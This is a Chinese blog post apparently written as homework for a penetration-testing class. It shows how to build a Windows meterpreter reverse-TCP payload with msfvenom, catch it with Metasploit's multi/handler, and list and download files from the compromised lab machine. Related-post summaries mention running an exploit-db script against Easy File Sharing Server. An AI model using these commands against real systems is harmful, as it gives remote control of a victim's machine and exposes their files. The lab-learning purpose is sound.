Metasploit应用

最新推荐文章于 2024-10-09 14:20:39 发布

ZeroVector

最新推荐文章于 2024-10-09 14:20:39 发布

阅读量2.6k

点赞数

分类专栏：网络渗透测试作业文章标签：安全渗透测试

本文链接：https://blog.csdn.net/ZeroVector/article/details/121916521

版权

网络渗透测试作业专栏收录该内容

5 篇文章 0 订阅

订阅专栏

1、在kali中生成一个被控端

输入指令msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /home/payload.exe

这里目标IP我填的是kali的IP。

可以看到文件中生成了payload.exe

2、在kali中打开Metasploit

依次输入

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 目标ip

set lport 5000

exploit

在靶机中打开kali生成的payload.exe后会有以下显示

说明已经获得靶机控制权。

3、下载靶机中的文件

输入ls可以查看靶机中的文件信息

输入download 文件名可以下载文件

测试完成

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ZeroVector

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

复现任务——漏洞渗透测试及Metasploit应用

m0_74087834的博客

12-29

1136

一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server（efssetup_2018.zip)，该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞，使得靶机运行计算器。见第六章PPT或PDF文档二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。见课本P127-133

Metasploit 中文手册.pdf

06-27

Metasploit软件帮助安全专家和 IT 专家识别安全问题、验证漏洞修复情况...本 POC 指南的内容涉及智能入侵测定、密码审计、web 应用程序扫描和社会工程。Metasploit 帮助团队进行协作，并在整合的报告中显示其发现结果。

参与评论您还未登录，请先登录后发表或查看评论

A：漏洞渗透测试和Metasploit应用

weixin_53130100的博客

12-01

261

在Windows中安装easyfile sharing 回到kali 使用nmap -sV 192.168.43.162 使用python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.43.162 8000 回到window 发现其已经调出了计算器

简单远程控制 Metasploit应用

m0_62659165的博客

11-22

313

简单远程控制 Metasploit应用

Metasploit应用举例

weixin_30590285的博客

03-21

126

本篇文章包含以下几方面内容： 1.Metasploit端口扫描： 2.用其他模块 3.metasploit smb获取系统信息 4.Metsploit服务识别 5.ftp识别： 6.metasploit密码嗅探 8.metasploit SMB登录检查 9.metasploit VNC身份验证 10.metasploit WMAP Web 扫描 1.Metasplo...

【简单远程控制】 Metasploit应用

qq_61947585的博客

11-21

1296

远程控制 Metasploit应用

【漏洞复现】Metasploit应用漏洞复现

ljn176118045的博客

12-29

403

然后利用kali查看payload的各种漏洞，但似乎都看不懂。依次输入以下代码，注意此处的ip为kali的ip。2、获得靶机(Windows)控制权。首先，输入代码，生成被控端可运行程序。可以看到有一个图片，我是放到桌面的。二、Metasploit应用。3、下载靶机上任意一个文件。1、生成主控端、被控端。接下来我们生成主控端。

easy file sharing server 漏洞利用和metasploit应用

qq_74370955的博客

12-26

415

用searchsploit easy file sharing 命令查看漏洞，漏洞对应利用脚本文件在/usr/share/exploitdb/exploits/windows/remote/下。msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者ip lport=攻击者要开的端口。提示端口被占用，关闭靶机的iis，再打开easy file sharing server运行服务。-f format 指定有效载荷的形式。kali扫描靶机开放的服务情况。

easy file sharing server漏洞渗透测试及Metasploit应用

zzzfff__的博客

11-06

481

1、靶机(Windows)安装easy file sharing server（efssetup_2018.zip)，该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞，使得靶机运行计算器。

复现任务A(漏洞渗透测试与Metasploit应用)

qq_61793472的博客

11-20

450

网络渗透测试课，复现任务A

metasploit-framework-6.3.34.zip

09-17

1. 漏洞利用：Metasploit提供了大量的已知漏洞利用模块，覆盖了各种操作系统、网络服务和应用程序。这些模块可以自动或手动执行，帮助安全专家验证漏洞的存在并进行攻击模拟。 2. 社会工程学工具：Metasploit还包含...

metasploit

01-02

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的...这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。

网络安全概述：从认知到实践

l1x1n0的博客

10-04

935

网络安全：保护网络系统的硬件、软件及数据，确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域，需要个人、企业和国家共同努力。提高安全意识，掌握基本防护技能，遵守相关法律法规，是每个网络用户应尽的责任。同时，网络安全产业的快速发展也为相关人才提供了广阔的职业前景。

信息安全工程师（28）机房安全分析与防护

m0_73399576的博客

10-02

946

信息安全工程师——机房安全分析与防护篇

微服务架构：核心组件解析与设计思考（服务发现、API网关、配置中心、负载均衡、服务调用、服务熔断、链路追踪、消息队列、服务安全、分布式事务）

项目git同名HuYaochao，未入职

10-06

1108

（服务发现、API网关、配置中心、负载均衡、服务调用、服务熔断、链路追踪、消息队列、服务安全、分布式事务）

MySQL 安全

学习,分享一直在路上

10-06

1005

MySQL安全实践

叉车毫米波雷达防撞技术，保护叉车作业安全

jiuxin666的博客

10-09

309

叉车毫米波防撞系统利用毫米波雷达技术实时监测环境，预警并紧急制动防碰撞，适用于狭窄通道，保护驾驶员及财产安全，实现叉车作业安全高效。

【Parsec】一款安全高效的远程桌面软件